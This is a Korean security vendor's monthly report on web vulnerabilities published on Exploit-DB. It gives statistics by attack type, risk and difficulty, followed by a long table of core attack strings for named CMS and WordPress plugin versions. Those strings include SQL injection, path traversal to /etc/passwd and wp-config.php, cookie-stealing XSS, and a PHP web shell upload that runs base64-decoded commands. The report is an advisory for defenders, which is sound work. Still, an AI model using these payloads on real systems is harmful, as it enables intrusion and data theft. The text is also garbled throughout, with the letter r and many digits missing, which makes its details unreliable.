EDB 분석보고서 (05.0) 05.0.0~05.0.8 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 05 년 월에공개된 Exploit-DB 의분석결과, 지난 월의분석결과와동일하게 SQL Injection 과 Coss Site Scipting(XSS) 공격에대한보고개수가가장많았습니다. 이번 월은최근 6 개월간의보고중가장많은이보고된기간인것과더불어위험도가매우높은들이다수분포되어있다는특징을지닙니다. 약 60% 에달하는이매우낮은난이도의공격으로분석된반면, 약 65% 에달하는이위험도가매우높은것으로확인되고있어, 가장많은개수가보고된 SQL Injection 과 Coss Site Scipting(XSS) 공격에대해특별히주의가요구됩니다. 한편, 주요소프트웨어발생현황을보면 Open Souce CMS 인 u5cms 와웹기반의 PHP Toubleshooting Tool 인 PHPBugTacke 가가장많은이보고되었고종류도다양하게발견되었습니다. 금월에새로보고된 u5cms 는작고가벼운사이트를만들기위해적합한 CMS 로써자신의사이트가해당 CMS 를사용하고있다면보안패치를실시하여에노출되지않도록대비해야겠습니다.. 별보고개수 보고개수 SQL Injection 3 XSS 4 LFI 6 File Upload 총합계 6 70 60 50 40 30 0 0 0 별보고개수 6 3 4 6 SQL Injection XSS LFI File Upload 총합계. 위험도별분류 위험도 보고개수 백분율 상 40 64.5% 중 35.48% 하 0 0.00% 합계 6 00.00% 위험도별분류 상 40 중 3. 공격난이도별현황공격난이도 보고개수 백분율 상.6% 중 4 38.7% 하 37 59.68% 총합계 6 00.00% 37 공격난이도별현황 4 상 중 하 4. 주요소프트웨어별발생현황소프트웨어이름 u5cms Wodpess Seve Zeuscat Piwigo WeBid Sefengo Redaxscipt Pagyan Pandoa IBM Endpoint Manage Fok Exponent Clipbucket Chamilo BeehiveFoum 총합계 보고개수 7 7 7 3 6 주요소프트웨어별발생현황 7 3 7 7 u5cms Wodpess Seve Zeuscat Piwigo WeBid Sefengo Redaxscipt Pagyan Pandoa IBM Endpoint Manage Fok ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3609 XSS 하 중 u5cms 3.9.3 - index.php XSS U5cms 3609 XSS 하 중 u5cms 3.9.3 - copy.php XSS U5cms 3609 XSS 하 중 u5cms 3.9.3 - delete.php XSS U5cms 3609 XSS 하 중 u5cms 3.9.3 - done.php XSS U5cms 3609 XSS 하 중 u5cms 3.9.3 - edito.php XSS U5cms 3609 XSS 하 중 u5cms 3.9.3 - notdone.php XSS U5cms 3609 XSS 하 중 u5cms 3.9.3 - sendfile.php XSS U5cms 3609 XSS 하 중 u5cms 3.9.3 - chaactes.php XSS U5cms 3608 LFI 하 중 u5cms 3.9.3 - thumb.php LFI U5cms 3607 SQL Injection 하 상 u5cms 3.9.3 - copy.php SQL U5cms
EDB 분석보고서 (05.0) 05.0.0~05.0.8 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 3607 SQL Injection 하 상 u5cms 3.9.3 - localize.php SQL U5cms 3607 SQL Injection 하 상 u5cms 3.9.3 - meta.php SQL U5cms 3607 SQL Injection 하 상 u5cms 3.9.3 - metai.php SQL U5cms 3607 SQL Injection 하 상 u5cms 3.9.3 - nc.php SQL U5cms 3607 SQL Injection 하 상 u5cms 3.9.3 - new.php SQL U5cms 3607 SQL Injection 하 상 u5cms 3.9.3 - ename.php SQL U5cms 3606 LFI 하 상 u5cms 3.9.3 - deletefile.php LFI U5cms 3660 SQL Injection 중 상.6.0 - poject.php SQL 3660 XSS 하 중.6.0 - poject.php XSS 3660 XSS 중 중.6.0 - use.php XSS 3660 XSS 중 중.6.0 - goup.php XSS 3660 SQL Injection 중 중.6.0 - goup.php SQL 3660 SQL Injection 중 상.6.0 - status.php SQL 3660 XSS 중 상.6.0 - status.php XSS 3660 SQL Injection 중 상.6.0 - esolution.php SQL 3660 SQL Injection 중 상.6.0 - seveity.php SQL 3660 XSS 중 상.6.0 - seveity.php XSS 3660 SQL Injection 중 상.6.0 - pioity.php SQL 3660 SQL Injection 중 상.6.0 - os.php SQL I 3660 XSS 중 상.6.0 - os.php XSS 3660 SQL Injection 중 상.6.0 - database.php SQL 3660 XSS 중 상.6.0 - database.php XSS 3660 SQL Injection 중 상.6.0 - site.php SQL 3660 SQL Injection 중 상.6.0 - bug.php SQL 36039 LFI 하 상 Wodpess Theme Divi Abitay - admin-ajax.php Local File Inclusion Vulneability Wodpess 36054 SQL Injection 중 상 Wodpess Suvey and poll - SQL Wodpess 36058 SQL Injection 하 상 Wodpess Video Galley.7.0 - SQL Wodpess 3606 SQL Injection 상 상 WodPess Webdoado Spide Event Calenda.4.9 - admin-ajax.php SQL Wodpess 36086 SQL Injection 중 상 WondePlugin Audio Playe.0 - admin-ajax.php SQL Wodpess 36086 XSS 하 상 WondePlugin Audio Playe.0 - admin-ajax.php XSS Wodpess 36097 XSS 하 상 WodPess Fancybox 3.0. - fancybox.php XSS Wodpess
EDB 분석보고서 (05.0) 05.0.0~05.0.8 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 05-0-0 3597 SQL Injection 하상 Sefengo CMS.6. - main.php SQL POST /sefengo/backend/main.php HTTP/. eseach-itasvn.hcloud.com Use-Agent: Mozilla/5.0 (Windows NT 6.; WOW64; v:35.0) Gecko/0000 Fiefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/ *;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: bowsespy_js=; sefengo=867bb0746d09b06b879f786356 Connection: keep-alive Content-Type: application/x-www-fom-ulencoded Content-Length: Sefengo Sefengo CMS.6. value_to_save=45&sefengo=867bb0746d09b06b8 79f786356&aea=settings&action=save_value&value_id= 3 and = -- 05-0-04 3599 SQL Injection 하 상 05-0-05 35996 LFI 하 중 05-0-05 35996 XSS 하 중 05-0-05 35996 XSS 하 중 Pagyan CMS 3.0 - SQL Injection Seve MAGMI Plugin - ajax_pluginconf.php LFI Seve MAGMI Plugin - magmi.php XSS Seve MAGMI Plugin - magmi_impot_un.php XSS /use:%7+and+=+union+select+database%8%9,v esion%8%9,3+--+ /magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=customs QLUtility /magmi/web/magmi.php?configstep=&pofile=</scipt><s /magmi/web/magmi_impot_un.php?</scipt><scipt>ale t('xss');</scipt> Pagyan Seve Seve Seve Pagyan CMS 3.0 Seve MAGMI Plugin Seve MAGMI Plugin Seve MAGMI Plugin 05-0-09 36039 LFI 하상 Wodpess Theme Divi Abitay - admin-ajax.php Local File Inclusion Vulneability /wp-admin/adminajax.php?action=evslide_show_image&img=../wpconfig.php Wodpess Wodpess Theme Divi Abitay 05-0-09 3603 LFI 하중 05-0-09 3609 XSS 하중 - fotogaleie.php Local File Inclusion /path/fotogaleie.php?id=../../../../../../../../../../etc/passwd %00 u5cms 3.9.3 - index.php XSS 취 /u5cms/index.php?c=stat"><scipt>alet()</scipt>&l=e& 약점 p=&= 05-0-09 3609 XSS 하중 u5cms 3.9.3 - copy.php XSS /u5cms/u5admin/copy.php?name=album"><img%0sc% 3da%0oneo%3dalet(7)> 05-0-09 3609 XSS 하중 u5cms 3.9.3 - delete.php XSS /u5cms/u5admin/delete.php?name=a"><img%0sc%3da %0oneo%3dalet(8)> 05-0-09 3609 XSS 하중 u5cms 3.9.3 - done.php XSS /u5cms/u5admin/done.php?n=inseted%0test"><scipt> alet()</scipt> 05-0-09 3609 XSS 하 중 05-0-09 3609 XSS 하 중 05-0-09 3609 XSS 하 중 05-0-09 3609 XSS 하 중 05-0-09 3608 LFI 하 중 u5cms 3.9.3 - edito.php XSS /u5cms/u5admin/edito.php?c=c"><scipt>alet()</scipt > u5cms 3.9.3 - notdone.php /u5cms/u5admin/notdone.php?n=wong%0name,%0n XSS ot%0deleted%0<scipt>alet(4)</scipt> u5cms 3.9.3 - sendfile.php XSS /u5cms/u5admin/sendfile.php?name=shotefeence&l=_f d"><scipt>alet(6)</scipt>&typ=d u5cms 3.9.3 - chaactes.php /u5cms/u5admin/chaactes.php?moe=335&s=335"><sci XSS pt>alet(7)</scipt> u5cms 3.9.3 - thumb.php LFI 취 /u5cms/thumb.php?w=00&f=../../../../../../../../../../etc/p 약점 asswd%00 05-0-09 3607 SQL Injection 하상 u5cms 3.9.3 - copy.php SQL POST /u5cms/u5admin/copy.php?name=album HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr Use-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Tident/6.0) Content-Type:application/x-www-fom-ulencoded name=album' and ''=' 05-0-09 3607 SQL Injection 하 상 05-0-09 3607 SQL Injection 하 상 05-0-09 3607 SQL Injection 하 상 05-0-09 3607 SQL Injection 하 상 u5cms 3.9.3 - localize.php SQL u5cms 3.9.3 - meta.php SQL u5cms 3.9.3 - metai.php SQL u5cms 3.9.3 - nc.php SQL /u5cms/u5admin/edito.php?c=stat' and ''=' /u5cms/u5admin/localize.php?name=album' and ''=' /u5cms/u5admin/metai.php?typ=a&name=album' and '' = ' /u5cms/u5admin/nc.php?name=o' and ''=' 05-0-09 3607 SQL Injection 하상 u5cms 3.9.3 - new.php SQL POST /u5cms/u5admin/new.php?name=album HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr Use-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Tident/6.0) Content-Type: application/x-www-fom-ulencoded name=test' and ''=' "&typ=e 05-0-09 3607 SQL Injection 하상 05-0-09 3606 LFI 하상 u5cms 3.9.3 - ename.php SQL u5cms 3.9.3 - deletefile.php LFI GET /u5cms/u5admin/ename.php?name=valbum&newname =valbum' and ''='&typ=a /u5cms/u5admin/deletefile.php?typ=d&name=shotefee nce&f=../../../../../../deleteme.txt
EDB 분석보고서 (05.0) 05.0.0~05.0.8 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 05-0-09 3603 SQL Injection 하상 Redaxscipt CMS..0 - seach.php SQL POST /edaxscipt/ HTTP/. taget.local Use-Agent: Mozilla/5.0 (Windows NT 6.; WOW64; v:34.0) Gecko/0000 Fiefox/34.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/ *;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=khtnnmtvvk3sif0no36787; GEAR=local-54433b500446ead5000d4 Connection: keep-alive Content-Type: application/x-www-fom-ulencoded Content-Length: 96 Redaxscipt Redaxscipt CMS..0 seach_tems=test' o ''='&seach_post=&token=4bcb85bc6f5c9303e4f95 d9f00833faf94&seach_post=seach 05-0-09 3604 SQL Injection 하상 Fok CMS 3.8.5 - fom SQL /pivate/en/locale/index?fom=filte&fom_token=68aa8d 73e0bd95a70e673784603d5&application=&module= &type[]=act'+(select * fom (select(sleep(0)))a)+'&type[]=e&type[]=lbl&type[]=msg &language[]=en&name=&value= Fok Fok CMS 3.8.5 05-0-09 36040 SQL Injection 중상 Chamilo LMS.9.8 - m_categoy.php SQL Injection /chamiloul/main/esevation/m_categoy.php?action=delete&id=0 UNION (SELECT IF(subst(passwod,,) = CHAR(00), SLEEP(5), 0) FROM use WHERE use_id = ) Chamilo Chamilo LMS.9.8 05-0- 36057 XSS 하중 IBM Endpoint Manage - XSS /cgi-bin/bfentepise/besgathemionew.exe/- gathevesion?body=gathespecifiedvesion&vesion=&u l=http://"><scipt>alet(/xss/)</scipt>&vesion=&usecr C=0 IBM Endpoint Manage IBM Endpoint Manage 9..x vesions ealie than 9..9 또는 9..x vesions ealie than 9...48 05-0- 36055 SQL Injection 하상 Pandoa FMS 5. SP - index.php SQL /pandoa/index.php?extension_in_menu=estado&sec=ext ensions&sec=extensions/agents_modules&ef=&offset=- ' and ''=''-- Pandoa Pandoa FMS 5. SP 05-0- 36054 SQL Injection 중상 Wodpess Suvey and poll - SQL /wp-admin/adminajax.php?action=ajax_suvey&sspcmd=save&suvey_id= 3556498 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x0)),3,))>75 Wodpess Wodpess Suvey and poll 05-0- 36058 SQL Injection 하상 Wodpess Video Galley.7.0 - SQL /wp-admin/adminajax.php%3faction=ss&type=video&vid=%0and%0 = Wodpess Wodpess Video Galley.7.0 05-0- 36509 XSS 하상 Exponent CMS.3. - XSS /news/show/title/"><scipt>alet(7)</scipt>time-fo-a-heavy Exponent Exponent CMS.3. 05-0-3 3606 SQL Injection 상상 WodPess Webdoado Spide Event Calenda.4.9 - adminajax.php SQL /wp-admin/adminajax.php?action=spidebigcalenda_month&theme_id=3 &calenda=&select=month,list,week,day,&date=05-0&many_sp_calenda=&cu_page_ul=%s&cat_id=)% %0UNION%%0SELECT%%0%s,,%%0FROM_UNI XTIME(43004400),,(SELECT%%0CONCAT(CHAR(35, 35,35,35),table_name,CHAR(35,35,35,35))%%0FROM %%0infomation_schema.tables%%0WHERE%%0ta ble_name%%0like%%0(%%0select%%0char( 37,%%07,%%05,%%00,%%04,%%0 5)%%0)%%0LIMIT%%0),,,,,%%0CHAR( 0,%%0,%%095,%%04,%%00,%%0,%%00,%%097,%%06),,,,,,,,,% %0FROM%%0DUAL;--%%0--%%0&widget=0') Wodpess WodPess Webdoado Spide Event Calenda.4.9 05-0-6 36086 SQL Injection 중상 WondePlugin Audio Playe.0 - admin-ajax.php SQL Injection POST /wp-admin/adminajax.php?action=wondeplugin_audio_save_item HTTP/. Use-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chome/6.0.9.75 Safai/535.7 Content-Type: application/x-www-fom-ulencoded chaset=utf-8 Wodpess Wodpess WondePlugin Audio Playe.0 item[id]= UNION (SELECT,, 3, 4, IF(subst(use_pass,,) = CHAR(36), SLEEP(5), 0) FROM `wp_uses` WHERE ID = )
EDB 분석보고서 (05.0) 05.0.0~05.0.8 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 05-0-6 36086 XSS 하상 WondePlugin Audio Playe.0 - admin-ajax.php XSS POST /wp-admin/adminajax.php?action=wondeplugin_audio_save_item HTTP/. Use-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chome/6.0.9.75 Safai/535.7 Content-Type: application/x-www-fom-ulencoded; chaset=utf-8 Wodpess Wodpess WondePlugin Audio Playe.0 item[id]=<scipt>alet(sting.fomchacode(88,83,83));</s cipt>&item[customcss]=</style><scipt>alet(sting.fomc hacode(88,83,83));</scipt> 05-0-6 36089 SQL Injection 중 상 05-0-6 36089 LFI 하 중 v4.4.0.0.39 - SQL v4.4.0.0.39 - expot.jsp LFI /cm/blogss/feed?entity=mostviewedpost&analyticstype=b log&catid=-) AND 64=BENCHMARK(0000000,MD5(0x73764b7a)) AND (398=398&count=0&et_cw=850&et_ch=600 /cm/newui/blog/expot.jsp?filepath=../conf/catalina/local host/cm.xml&stat=tue&et_cw=350&et_ch=00 v4.4.0.0.39 v4.4.0.0.39 05-0-6 36097 XSS 하상 WodPess Fancybox 3.0. - fancybox.php XSS POST /wp-admin/admin-ajax.php HTTP/. Use-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chome/6.0.9.75 Safai/535.7 Content-Type: application/x-www-fom-ulencoded; chaset=utf-8 WodPess WodPess Fancybox 3.0. 05-0-9 367 XSS 중상 Piwigo.7.3 - admin.php XSS action=update&mfbfw[padding]=</scipt><scipt>alet('xs s')</scipt> /admin.php?page=plugin-admintools<img sc=n oneo=eval(sting.fomchacode(97,08,0,4,6,4 0,00,,99,7,09,0,0,6,46,99,,,07, 05,0,4,59)) > Piwigo Piwigo.7.3 05-0-9 367 SQL Injection 중상 Piwigo.7.3 - admin.php SQL POST /piwigo/admin.php?page=histoy HTTP/. localhost Use-Agent: Mozilla/5.0 (X; Linux x86_64; v:3.0) Gecko/0000 Fiefox/3.0 Iceweasel/3.3.0 Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: pwg_display_thumbnail=no_display_thumbnail; Content-Type: application/x-www-fom-ulencoded Content-Length: 55 Piwigo Piwigo.7.3 stat=05-0-08 &end=05-0-09 &types[]=none&types[]=pictue&types[]=high&types[]=oth e&use=) AND = UNION SELECT use(),database(),3,vesion(),5,6,7,8,9 -- 05-0-3 3654 XSS 하중 Beehive Foum.4.4 - edit_efs.php XSS POST /edit_pefs.php HTTP/. Use-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chome/6.0.9.75 Safai/535.7 Content-Type: application/x-www-fom-ulencoded; chaset=utf-8 webtag=default&nickname=test&email=test&fistname= test&lastname=test&dob_day=3&dob_month=3&dob_yea =989&homepage_ul=<scipt>alet();</scipt>&homepa ge_ul_global=y&pic_ul=<scipt>alet();</scipt>&pic_ul _global=y&avata_ul=<scipt>alet();</scipt>&avata_ul _global=y&save=save BeehiveFoum BeehiveFoum.4.4 05-0-3 3655 File Upload 하상 WeBid.. - ajax.php File Upload POST /ajax.php?do=uploadaucimages HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr Use-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Tident/6.0) Content-Type: multipat/fom-data; bounday=--------------- ------------7dd009908f WeBid WeBid.. -----------------------------7dd009908f Content-Disposition: fom-data; name="filedata"; filename="shell.php" Content-Type: application/octet-steam <?php eo_epoting(0); pint( ); passthu(base64_decode(\$_server[http_cmd]));?> -----------------------------7dd009908f-- 05-0-3 3656 SQL Injection 하중 05-0-3 3659 XSS 중중 Clipbucket.7 RC3 0.9 - view_item.php SQL Zeuscat v.4 - index.php XSS /clipbucket/view_item.php?item=a%7%0o%0%7a %7=%7a&type=photos&collection=9 /index.php?do=seach&seach=%%3e%3cbody%0o nload=eval%8alet%8document.cookie%9%9%0 %3E%3C!-- Clipbucket Clipbucket.7 RC3 0.9 Zeuscat Zeuscat v.4
EDB 분석보고서 (05.0) 05.0.0~05.0.8 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 05-0-3 3659 SQL Injection 중상 05-0-3 3660 SQL Injection 중상 05-0-3 3660 XSS 하중 Zeuscat v.4 - /admin SQL.6.0 - poject.php SQL.6.0 - poject.php XSS /admin/?do=dispodes&action=detail&id=+and+=+un ion+select+,,3,4,5,6,7,8,9,0,,,3,4,5,6,7,8, 9,0,,,3,4,5,6,7,8,9,30,3,3,database% 8%9,34,35,vesion%8%9,37,38+--+ /admin/poject.php?op=edit_component&id=%7+and+ =+union+select+,,database%8%9,use%8%9, 5,6,vesion%8%9,8,9,0,,+--+ POST /admin/poject.php?op=add HTTP/. Use-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chome/6.0.9.75 Safai/535.7 Content-Type: application/x-www-fom-ulencoded; chaset=utf-8 Zeuscat Zeuscat v.4.6.0.6.0 poject_name=<scipt>alet();</scipt> 05-0-3 3660 XSS 중중 05-0-3 3660 XSS 중중.6.0 - use.php XSS.6.0 - goup.php XSS /admin/use.php?op=edit&use_js=%%3e%3cscipt% 3Ealet%8document.cookie%9%3C/scipt%3E&use_i d= /admin/goup.php?op=edit&use_js=%%3e%3cscipt %3Ealet%8document.cookie%9%3C/scipt%3E&go up_id=.6.0.6.0 05-0-3 3660 SQL Injection 중중.6.0 - goup.php SQL /admin/goup.php?op=edit&use_js=&goup_id=+and+s LEEP%80%9.6.0 05-0-3 3660 SQL Injection 중상.6.0 - status.php SQL /admin/status.php?op=edit&status_id=%7+and+=+u nion+select+,use%8%9,database%8%9,vesion% 8%9,5.6.0 05-0-3 3660 XSS 중상.6.0 - status.php XSS POST /admin/status.php?op=edit&use_js=&status_id=0 HTTP/. Use-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chome/6.0.9.75 Safai/535.7 Content-Type: application/x-www-fom-ulencoded; chaset=utf-8.6.0 Desciption=<scipt>alet();</scipt> 05-0-3 3660 SQL Injection 중 상 05-0-3 3660 SQL Injection 중 상.6.0 - esolution.php SQL.6.0 - seveity.php SQL /admin/esolution.php?op=edit&esolution_id=%7+and +=+union+select+,use%8%9,database%8%9,v esion%8%9 /admin/seveity.php?op=edit&seveity_id=%7+and+= +union+select+,use%8%9,database%8%9,vesi on%8%9,5.6.0.6.0 05-0-3 3660 XSS 중상.6.0 - seveity.php XSS POST /admin/seveity.php?op=edit&use_js=&seveity_id=0 HTTP/. Use-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chome/6.0.9.75 Safai/535.7 Content-Type: application/x-www-fom-ulencoded; chaset=utf-8.6.0 Desciption=<scipt>alet();</scipt> 05-0-3 3660 SQL Injection 중 상 05-0-3 3660 SQL Injection 중 상.6.0 - pioity.php SQL.6.0 - os.php SQL /admin/pioity.php?op=edit&pioity_id=%7+and+= +union+select+,use%8%9,database%8%9,4,vesi on%8%9+--+ /admin/os.php?op=edit&os_id=%7+and+=+union+s elect+,use%8%9,database%8%9,vesion%8% 9+--+.6.0.6.0 05-0-3 3660 XSS 중상.6.0 - os.php XSS POST /admin/os.php?op=edit&use_js=&os_id=0 HTTP/. Use-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chome/6.0.9.75 Safai/535.7 Content-Type: application/x-www-fom-ulencoded; chaset=utf-8.6.0 Regex=<scipt>alet();</scipt> 05-0-3 3660 SQL Injection 중상.6.0 - database.php SQL /admin/database.php?op=edit&database_id=%7+and+ =+union+select+,use%8%9,vesion%8%9.6.0 05-0-3 3660 XSS 중상.6.0 - database.php XSS POST /admin/database.php?op=edit&use_js=&database_id=0 HTTP/. Use-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chome/6.0.9.75 Safai/535.7 Content-Type: application/x-www-fom-ulencoded; chaset=utf-8.6.0 Name=<scipt>alet();</scipt> 05-0-3 3660 SQL Injection 중상 05-0-3 3660 SQL Injection 중상.6.0 - site.php SQL.6.0 - bug.php SQL /admin/site.php?op=edit&site_id=5%7+and+=+union +select+,vesion%8%9,database%8%9 /bug.php?op=add&poject=%7+and+=+union+selec t+use%8%9.6.0.6.0